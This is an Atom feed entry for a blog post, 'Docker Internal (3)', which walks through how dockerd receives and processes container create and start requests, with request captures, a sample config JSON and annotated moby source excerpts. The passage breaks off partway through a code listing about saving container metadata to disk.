<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://u1f383.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://u1f383.github.io/" rel="alternate" type="text/html" /><updated>2026-06-04T07:55:41+00:00</updated><id>https://u1f383.github.io/feed.xml</id><title type="html">Blog</title><subtitle></subtitle><entry><title type="html">Docker Internal (3)</title><link href="https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html" rel="alternate" type="text/html" title="Docker Internal (3)" /><published>2026-06-04T00:00:00+00:00</published><updated>2026-06-04T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html"><![CDATA[<p>In the third post, we’ll discuss how the container is loaded.</p>

<p>Since the vulnerability I found has not yet been patched 😢, I won’t discuss how the NVIDIA toolkit can work as a replacement runtime in this post. I’ll cover it in a future post once the bug has been fixed.</p>

<p><img src="/assets/image-20260604000000000.png" alt="image-20260604000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h2 id="1-load-a-container">1. Load a Container</h2>

<p>If you run <code class="language-plaintext highlighter-rouge">docker run --rm -it ubuntu:24.04</code>, <code class="language-plaintext highlighter-rouge">dockerd</code> will receive two HTTP requests. The first is to create a container, which is the same as executing <code class="language-plaintext highlighter-rouge">docker create ubuntu:24.04</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/containers/create HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 1711
Content-Type: application/json
...
</code></pre></div></div>

<p>The second is to start the container, which is the same as executing <code class="language-plaintext highlighter-rouge">docker start &lt;container_id&gt;</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/containers/17b7029c5b5121a40ef71d91640fff00f20152df0b167a4464c02450c208b8a1/start HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0
</code></pre></div></div>
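
<p>The create-then-start sequence can be reproduced with a small client. The sketch below is only an illustration: <code class="language-plaintext highlighter-rouge">runSequence()</code> and <code class="language-plaintext highlighter-rouge">fakeDaemon()</code> are hypothetical names, and the fake server stands in for <code class="language-plaintext highlighter-rouge">dockerd</code> so the example runs without Docker. It assumes the documented Engine API behavior: create answers <code class="language-plaintext highlighter-rouge">201</code> with an <code class="language-plaintext highlighter-rouge">Id</code> field, and start answers <code class="language-plaintext highlighter-rouge">204</code>.</p>

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// createResponse holds the fields of the create response that we need.
type createResponse struct {
	Id       string
	Warnings []string
}

// runSequence sends the two requests in order: create first, then start,
// using the ID returned by the create call. baseURL is a stand-in for the
// daemon endpoint (the real CLI talks to a unix socket).
func runSequence(baseURL, image string) (string, error) {
	payload, err := json.Marshal(map[string]string{"Image": image})
	if err != nil {
		return "", err
	}
	resp, err := http.Post(baseURL+"/containers/create", "application/json", bytes.NewReader(payload))
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusCreated {
		return "", fmt.Errorf("create: unexpected status %s", resp.Status)
	}
	var created createResponse
	if err := json.NewDecoder(resp.Body).Decode(&created); err != nil {
		return "", err
	}

	startResp, err := http.Post(baseURL+"/containers/"+created.Id+"/start", "", nil)
	if err != nil {
		return "", err
	}
	defer startResp.Body.Close()
	if startResp.StatusCode != http.StatusNoContent {
		return "", fmt.Errorf("start: unexpected status %s", startResp.Status)
	}
	return created.Id, nil
}

// fakeDaemon is a hypothetical stand-in for dockerd. It records each call
// and always hands out the fixed container ID "abc123".
func fakeDaemon(calls *[]string) *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/containers/create", func(w http.ResponseWriter, r *http.Request) {
		*calls = append(*calls, r.Method+" "+r.URL.Path)
		w.Header().Set("Content-Type", "application/json")
		w.WriteHeader(http.StatusCreated)
		json.NewEncoder(w).Encode(createResponse{Id: "abc123", Warnings: []string{}})
	})
	mux.HandleFunc("/containers/abc123/start", func(w http.ResponseWriter, r *http.Request) {
		*calls = append(*calls, r.Method+" "+r.URL.Path)
		w.WriteHeader(http.StatusNoContent)
	})
	return httptest.NewServer(mux)
}

func main() {
	var calls []string
	srv := fakeDaemon(&calls)
	defer srv.Close()

	id, err := runSequence(srv.URL, "ubuntu:24.04")
	fmt.Println(id, err, calls)
}
```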

<p><code class="language-plaintext highlighter-rouge">dockerd</code>’s <code class="language-plaintext highlighter-rouge">initRoutes()</code> registers the handlers for both endpoints. We’ll read their implementations in the following sections.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/create"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersCreate</span><span class="p">),</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/start"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersStart</span><span class="p">),</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
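
<p>To see how a template such as <code class="language-plaintext highlighter-rouge">/containers/{name:.*}/start</code> picks the container ID out of a path, here is a rough approximation using a plain regular expression. This is not the router’s actual code: <code class="language-plaintext highlighter-rouge">startRoute</code> and <code class="language-plaintext highlighter-rouge">matchStart()</code> are hypothetical, and the optional version prefix is an assumption based on the <code class="language-plaintext highlighter-rouge">/v1.54/...</code> paths in the captured requests.</p>

```go
package main

import (
	"fmt"
	"regexp"
)

// startRoute approximates "/containers/{name:.*}/start" as a regular
// expression with a named capture group. The optional "/v<version>" prefix
// is an assumption, not taken from the router source.
var startRoute = regexp.MustCompile(`^(?:/v[0-9.]+)?/containers/(?P<name>.*)/start$`)

// matchStart returns the captured "name" variable in a map, similar in
// spirit to the vars map that the handlers receive.
func matchStart(path string) (map[string]string, bool) {
	m := startRoute.FindStringSubmatch(path)
	if m == nil {
		return nil, false
	}
	return map[string]string{"name": m[startRoute.SubexpIndex("name")]}, true
}

func main() {
	vars, ok := matchStart("/v1.54/containers/17b7029c5b51/start")
	fmt.Println(vars["name"], ok)

	_, ok = matchStart("/v1.54/containers/create")
	fmt.Println(ok)
}
```

<p>Because the pattern for <code class="language-plaintext highlighter-rouge">name</code> is <code class="language-plaintext highlighter-rouge">.*</code>, the variable can hold either a full ID or a container name.</p>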

<h3 id="11-create">1.1. Create</h3>

<p>The request body is a JSON object that holds the container’s configuration. The actual data looks like this:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
  </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ubuntu:24.04"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
  </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
  </span><span class="nl">"HostConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Binds"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ContainerIDFile"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"LogConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Type"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Config"</span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"NetworkMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">"default"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PortBindings"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
    </span><span class="nl">"RestartPolicy"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"no"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"MaximumRetryCount"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"AutoRemove"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"VolumeDriver"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"VolumesFrom"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ConsoleSize"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="mi">50</span><span class="p">,</span><span class="w">
      </span><span class="mi">212</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"CapAdd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CapDrop"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CgroupnsMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Dns"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"DnsOptions"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"DnsSearch"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"ExtraHosts"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"GroupAdd"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IpcMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Cgroup"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Links"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OomScoreAdj"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PidMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Privileged"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PublishAllPorts"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ReadonlyRootfs"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"SecurityOpt"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"UTSMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"UsernsMode"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ShmSize"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Isolation"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuShares"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Memory"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"NanoCpus"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CgroupParent"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"BlkioWeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"BlkioWeightDevice"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceReadBps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceWriteBps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceReadIOps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"BlkioDeviceWriteIOps"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"CpuPeriod"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuQuota"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuRealtimePeriod"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuRealtimeRuntime"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpusetCpus"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpusetMems"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Devices"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"DeviceCgroupRules"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"DeviceRequests"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemoryReservation"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemorySwap"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MemorySwappiness"</span><span class="p">:</span><span class="w"> </span><span class="mi">-1</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OomKillDisable"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"PidsLimit"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Ulimits"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span><span class="w">
    </span><span class="nl">"CpuCount"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"CpuPercent"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IOMaximumIOps"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"IOMaximumBandwidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
    </span><span class="nl">"MaskedPaths"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"ReadonlyPaths"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"NetworkingConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"EndpointsConfig"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"default"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"IPAMConfig"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Links"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Aliases"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"DriverOpts"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GwPriority"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"NetworkID"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"EndpointID"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"Gateway"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPAddress"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"MacAddress"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPPrefixLen"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"IPv6Gateway"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GlobalIPv6Address"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"GlobalIPv6PrefixLen"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w">
        </span><span class="nl">"DNSNames"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w">
      </span><span class="p">}</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">postContainersCreate()</code> first decodes the request into three different configs [1] and then creates a container based on these configs [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersCreate</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">req</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">runconfig</span><span class="o">.</span><span class="n">DecodeCreateRequest</span><span class="p">(</span><span class="n">rdr</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">RawSysInfo</span><span class="p">())</span>
    <span class="n">config</span><span class="p">,</span> <span class="n">hostConfig</span><span class="p">,</span> <span class="n">networkingConfig</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="n">NetworkingConfig</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">ccr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerCreate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">backend</span><span class="o">.</span><span class="n">ContainerCreateConfig</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">Name</span><span class="o">:</span>                        <span class="n">name</span><span class="p">,</span>
        <span class="n">Config</span><span class="o">:</span>                      <span class="n">config</span><span class="p">,</span>
        <span class="n">HostConfig</span><span class="o">:</span>                  <span class="n">hostConfig</span><span class="p">,</span>
        <span class="n">NetworkingConfig</span><span class="o">:</span>            <span class="n">networkingConfig</span><span class="p">,</span>
        <span class="n">Platform</span><span class="o">:</span>                    <span class="n">platform</span><span class="p">,</span>
        <span class="n">DefaultReadOnlyNonRecursive</span><span class="o">:</span> <span class="n">defaultReadOnlyNonRecursive</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
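
<p>The split into three configs follows the shape of the JSON body: the general settings sit at the top level, while <code class="language-plaintext highlighter-rouge">HostConfig</code> and <code class="language-plaintext highlighter-rouge">NetworkingConfig</code> are nested objects. A minimal sketch of that decoding, assuming a request struct that embeds the main config, could look like the following. The struct definitions are trimmed-down stand-ins with only a few fields, and <code class="language-plaintext highlighter-rouge">decodeCreateRequest()</code> is a hypothetical helper, not the real <code class="language-plaintext highlighter-rouge">runconfig.DecodeCreateRequest()</code>.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Trimmed-down stand-ins for the real config types.
type Config struct {
	Image string
	Tty   bool
}

type HostConfig struct {
	NetworkMode string
	AutoRemove  bool
}

type EndpointSettings struct {
	NetworkID string
}

type NetworkingConfig struct {
	EndpointsConfig map[string]*EndpointSettings
}

// CreateRequest embeds Config, so encoding/json reads its fields from the
// top level of the body. The other two configs come from nested objects.
type CreateRequest struct {
	*Config
	HostConfig       *HostConfig
	NetworkingConfig *NetworkingConfig
}

// decodeCreateRequest parses a request body into the three configs.
func decodeCreateRequest(body string) (*CreateRequest, error) {
	var req CreateRequest
	if err := json.NewDecoder(strings.NewReader(body)).Decode(&req); err != nil {
		return nil, err
	}
	return &req, nil
}

func main() {
	body := `{
	  "Image": "ubuntu:24.04",
	  "HostConfig": {"NetworkMode": "default"},
	  "NetworkingConfig": {"EndpointsConfig": {"default": {"NetworkID": ""}}}
	}`
	req, err := decodeCreateRequest(body)
	if err != nil {
		panic(err)
	}
	fmt.Println(req.Config.Image, req.HostConfig.NetworkMode, len(req.NetworkingConfig.EndpointsConfig))
}
```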

<p>Internally, <code class="language-plaintext highlighter-rouge">newContainer()</code> is called to create a container instance and set its root directory to <code class="language-plaintext highlighter-rouge">/var/lib/docker/containers/&lt;id&gt;</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">newContainer</span><span class="p">(</span><span class="n">name</span> <span class="kt">string</span><span class="p">,</span> <span class="n">platform</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">Config</span><span class="p">,</span> <span class="n">hostConfig</span> <span class="o">*</span><span class="n">containertypes</span><span class="o">.</span><span class="n">HostConfig</span><span class="p">,</span> <span class="n">imgID</span> <span class="n">image</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="n">managed</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">base</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">NewBaseContainer</span><span class="p">(</span><span class="n">id</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">daemon</span><span class="o">.</span><span class="n">repository</span><span class="p">,</span> <span class="n">id</span><span class="p">))</span> <span class="c">// [3]</span>
    <span class="c">// [...]</span>
    <span class="n">base</span><span class="o">.</span><span class="n">Config</span> <span class="o">=</span> <span class="n">config</span>
    <span class="n">base</span><span class="o">.</span><span class="n">HostConfig</span> <span class="o">=</span> <span class="n">hostConfig</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">base</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>
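
<p>As a small illustration of how the root directory is derived, the sketch below joins a repository path with a 64-character hex ID. Both helpers are hypothetical: <code class="language-plaintext highlighter-rouge">newID()</code> only mimics the shape of the IDs shown in this post and is not how <code class="language-plaintext highlighter-rouge">dockerd</code> is confirmed to generate them, and the repository path is assumed to be <code class="language-plaintext highlighter-rouge">/var/lib/docker/containers</code>.</p>

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"path/filepath"
)

// newID returns a random 64-character hex string, the same shape as the
// container IDs in this post. Illustrative stand-in only.
func newID() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

// containerRoot joins the repository directory and the container ID,
// matching the filepath.Join call marked [3].
func containerRoot(repository, id string) string {
	return filepath.Join(repository, id)
}

func main() {
	id, err := newID()
	if err != nil {
		panic(err)
	}
	fmt.Println(containerRoot("/var/lib/docker/containers", id))
}
```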

<p>After the container has been set up, its metadata is saved into <code class="language-plaintext highlighter-rouge">config.v2.json</code> for later use [4]. The host configuration is also saved, but it is kept separately in another file, <code class="language-plaintext highlighter-rouge">hostconfig.json</code> [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">CheckpointTo</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">store</span> <span class="o">*</span><span class="n">ViewDB</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">deepCopy</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">toDisk</span><span class="p">()</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">toDisk</span><span class="p">()</span> <span class="p">(</span><span class="o">*</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">pth</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">ConfigPath</span><span class="p">()</span> <span class="c">// config.v2.json</span>
    <span class="n">f</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">atomicwriter</span><span class="o">.</span><span class="n">New</span><span class="p">(</span><span class="n">pth</span><span class="p">,</span> <span class="m">0</span><span class="n">o600</span><span class="p">)</span>
    <span class="n">w</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">MultiWriter</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="n">f</span><span class="p">)</span>
